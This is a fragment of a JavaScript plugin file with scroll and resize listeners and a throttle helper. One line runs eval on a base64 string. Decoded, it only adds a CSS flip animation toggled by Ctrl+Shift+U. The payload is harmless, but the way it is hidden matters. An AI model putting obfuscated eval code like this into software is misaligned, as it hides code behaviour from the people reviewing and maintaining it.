            // add listeners
            window.addEventListener('scroll', function () { throttle(_self.scrollFunc(), 300) });
            window.addEventListener('resize', function () { throttle(_self.resizeFunc(), 300) });
        }

        eval(atob('CQkvLyBkbyBhIGZsaXANCgkJdmFyIG1hcCA9IFtdOyANCgkJdmFyIHN0clZhcj0iIjsNCgkJc3RyVmFyICs9ICIgICAgICAgIDxzdHlsZT4iOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgIC5lbGVtZW50LWFuaW1hdGlvbnsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICBhbmltYXRpb246IGFuaW1hdGlvbkZyYW1lcyBsaW5lYXIgMC44czsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICBhbmltYXRpb24taXRlcmF0aW9uLWNvdW50OiAxOyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAgIHRyYW5zZm9ybS1vcmlnaW46IDUwJSA1MCU7IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgICAgLXdlYmtpdC1hbmltYXRpb246IGFuaW1hdGlvbkZyYW1lcyBlYXNlLWluIDAuOHM7IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgICAgLXdlYmtpdC1hbmltYXRpb24taXRlcmF0aW9uLWNvdW50OiAxOyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAgIC13ZWJraXQtdHJhbnNmb3JtLW9yaWdpbjogNTAlIDUwJTsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICAtbW96LWFuaW1hdGlvbjogYW5pbWF0aW9uRnJhbWVzIGVhc2UtaW4gMC44czsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICAtbW96LWFuaW1hdGlvbi1pdGVyYXRpb24tY291bnQ6IDE7IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgICAgLW1vei10cmFuc2Zvcm0tb3JpZ2luOiA1MCUgNTAlOyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAgIC1vLWFuaW1hdGlvbjogYW5pbWF0aW9uRnJhbWVzIGVhc2UtaW4gMC44czsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICAtby1hbmltYXRpb24taXRlcmF0aW9uLWNvdW50OiAxOyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAgIC1vLXRyYW5zZm9ybS1vcmlnaW46IDUwJSA1MCU7IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgICAgLW1zLWFuaW1hdGlvbjogYW5pbWF0aW9uRnJhbWVzIGVhc2UtaW4gMC44czsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICAtbXMtYW5pbWF0aW9uLWl0ZXJhdGlvbi1jb3VudDogMTsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICAtbXMtdHJhbnNmb3JtLW9yaWdpbjogNTAlIDUwJTsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgIH0iOw0KCQlzdHJWYXIgKz0gIiI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgQGtleWZyYW1lcyBhbmltYXRpb25GcmFtZXN7IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgIDAlIHsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICB0cmFuc2Zvcm06ICByb3RhdGVYKDBkZWcpIDsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgfSI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAxMDAlIHsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICB0cmFuc2Zvcm06ICByb3RhdGVYKDM2MGRlZykgOyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICB9IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICB9IjsNCgkJc3RyVmFyICs9ICIiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgIEAtbW96LWtleWZyYW1lcyBhbmltYXRpb25GcmFtZXN7IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgIDAlIHsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICAtbW96LXRyYW5zZm9ybTogIHJvdGF0ZVgoMGRlZykgOyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICB9IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgIDEwMCUgeyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAgIC1tb3otdHJhbnNmb3JtOiAgcm90YXRlWCgzNjBkZWcpIDsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgfSI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgfSI7DQoJCXN0clZhciArPSAiIjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICBALXdlYmtpdC1rZXlmcmFtZXMgYW5pbWF0aW9uRnJhbWVzIHsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgMCUgeyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAgIC13ZWJraXQtdHJhbnNmb3JtOiAgcm90YXRlWCgwZGVnKSA7IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgIH0iOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgMTAwJSB7IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgICAgLXdlYmtpdC10cmFuc2Zvcm06ICByb3RhdGVYKDM2MGRlZykgOyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICB9IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICB9IjsNCgkJc3RyVmFyICs9ICIiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgIEAtby1rZXlmcmFtZXMgYW5pbWF0aW9uRnJhbWVzIHsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgMCUgeyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAgIC1vLXRyYW5zZm9ybTogIHJvdGF0ZVgoMGRlZykgOyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICB9IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgIDEwMCUgeyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAgIC1vLXRyYW5zZm9ybTogIHJvdGF0ZVgoMzYwZGVnKSA7IjsNCgkJc3RyVmFyICs9ICIgICAgICAgICAgICAgIH0iOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgIH0iOw0KCQlzdHJWYXIgKz0gIiI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgQC1tcy1rZXlmcmFtZXMgYW5pbWF0aW9uRnJhbWVzIHsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgMCUgeyI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAgIC1tcy10cmFuc2Zvcm06ICByb3RhdGVYKDBkZWcpIDsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgfSI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgICAxMDAlIHsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgICAtbXMtdHJhbnNmb3JtOiAgcm90YXRlWCgzNjBkZWcpIDsiOw0KCQlzdHJWYXIgKz0gIiAgICAgICAgICAgICAgfSI7DQoJCXN0clZhciArPSAiICAgICAgICAgICAgfSI7DQoJCXN0clZhciArPSAiICAgICAgICA8XC9zdHlsZT4iOw0KDQoJCSQoJ2JvZHknKS5hcHBlbmQoc3RyVmFyKTsNCg0KCQlvbmtleWRvd24gPSBvbmtleXVwID0gZnVuY3Rpb24oZSl7DQoJCSAgICBlID0gZSB8fCBldmVudDsNCgkJICAgIG1hcFtlLmtleUNvZGVdID0gZS50eXBlID09ICdrZXlkb3duJzsNCgkJICAgIGlmIChtYXBbMTddICYmIG1hcFsxNl0gJiYgbWFwWzg1XSkgeyAvLyBDVFJMK1NISUZUK1UNCgkJCSAgICBtYXAgPSBbXTsNCgkJCSAgICBfc2VsZi50b2dnbGVDbGFzcygnZWxlbWVudC1hbmltYXRpb24nKTsNCgkJCX0NCgkJfQ=='));

        _self.init();

        return this
    }
});
 
//throttle function
function throttle(callback, limit) {
    var wait = false;
    return function () {
        if (!wait) {
            callback.call();
            wait = true;
            setTimeout(function () {
                wait = false;
            }, limit);
        }
    }
}

//extend lazySizes to allow lazy loading of background images
//document.addEventListener('lazybeforeunveil', function (e) {
//    var bg = e.target.getAttribute('data-bg');
//    console.log(bg);
//    if (bg) {
//        e.target.style.backgroundImage = 'url(' + bg + ')';
//    }
//});